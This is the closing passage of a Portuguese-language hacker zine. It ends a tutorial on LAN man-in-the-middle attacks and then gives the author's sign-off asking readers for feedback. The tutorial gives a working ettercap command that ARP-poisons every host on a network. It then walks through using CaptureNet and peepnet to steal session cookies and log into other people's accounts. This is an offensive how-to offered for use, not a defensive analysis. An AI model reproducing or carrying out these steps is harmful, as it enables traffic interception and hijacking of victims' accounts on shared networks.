RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG, TELNET, FTP, POP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, LDAP, NFS.
Voce ainda pode fazer ataques mitm contra dados tunelados por PPTP, mas vamos fazer apenas o arp poisoning. Podemos especificar os computadores que queremos redirecionar o trafego, mas como a açao tem que ser rapida e voce nao tem tempo de dar um IPconfig para ver como está configurado o range de IPs para saber qual o IP da maquina que ela esta usando, utilize apenas a sintaxe de broadcast que e o //, com o // ele faz o que e correspondendo a um scan por interface grafica, ou seja, ele manda um broadcast arp, pega os MAC e envenena os caras. Apesar de voce poder fazer uma especificaçao de alvo, isso nao vem ao caso agora. Deverá ficar assim:
ettercap -i \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED} -Tq -M arp -o //
A velocidade da açao é tudo. Nao vamos configurar o CaptureNet (por hora), apenas abra o CaptureNet e clique em start capture, depois que voce tiver capturando pacotes abra o peepnet, existe um botao na tela do programa escrito Go get it! A unica coisa que voce tera que fazer é selecinar a seçao que deseja capturar no lado esquerdo da tela clicar neste botao. Voce podera sequestrar seçoes de qualquer computador na LAN, o peepnet mostra até o cookie com o ID da seção, ou seja, tu poderas se logar novamente quando voce quiser, apenas se logando no cookie utilizando o opera por exemplo.
http://www.hunterhacker.xpg.com.br/Untitled-1.jpg
----- C4p1Tul0 15
========================================================================================================== THE
END
BY 6_Bl4ck9_f0x6
Se gostou da zine ou se gostou apenas de um artigo da zine, manda um email ae cara, pois se não tiver gente lendo me desmotiva bastante ficar escrevendo a zine, repito, se gostou da zine manda um mail ae b-fox@bol.com.br, se naum gostou também manda, se quer sugerir algo, quer mandar matérias, manda email ae for me que faço questão de publica-las. Gostaria de sua ajuda para a distribuição da C.O.D.E, pois a principal intenção dela é tentar transportar os tempos de ouro para a nossa época, espero ter conseguido com a ajuda da introdução da zine e do artigo Zines de ontem e de hoje, colocar em sua mente que fazer zines é legal, pois podemos nos expresar e ser ouvidos por outras pessoas que compartilham o mesmo gosto que nós, o hacking.
Se quiser me xingar - Manda que publico
Se quiser elogia - Manda que publico
Se quiser perguntar - Manda que eu respondo, se eu nao souber, vou para o inferno atraz da informaçao para voces
Se eu tiver vacilado no texto - Manda que eu corrijo o erro e publico sua mensagem
Se quiserem mandar seus textos - Mandem que eu publico "se forem bons :-)"
Se nao quiserem ser identificados eu nao posto o remetente
Mas sempre usem um remailer galera, detesto ter que ficar camuflando email com *
Mandem emails como se fossem o pato donald, super man e tals uhauhauhauh e mais legal
===========================================================================================================
Abraçao Galera e ate a proxima ediçao da minha, da sua, da nossa C.O.D.E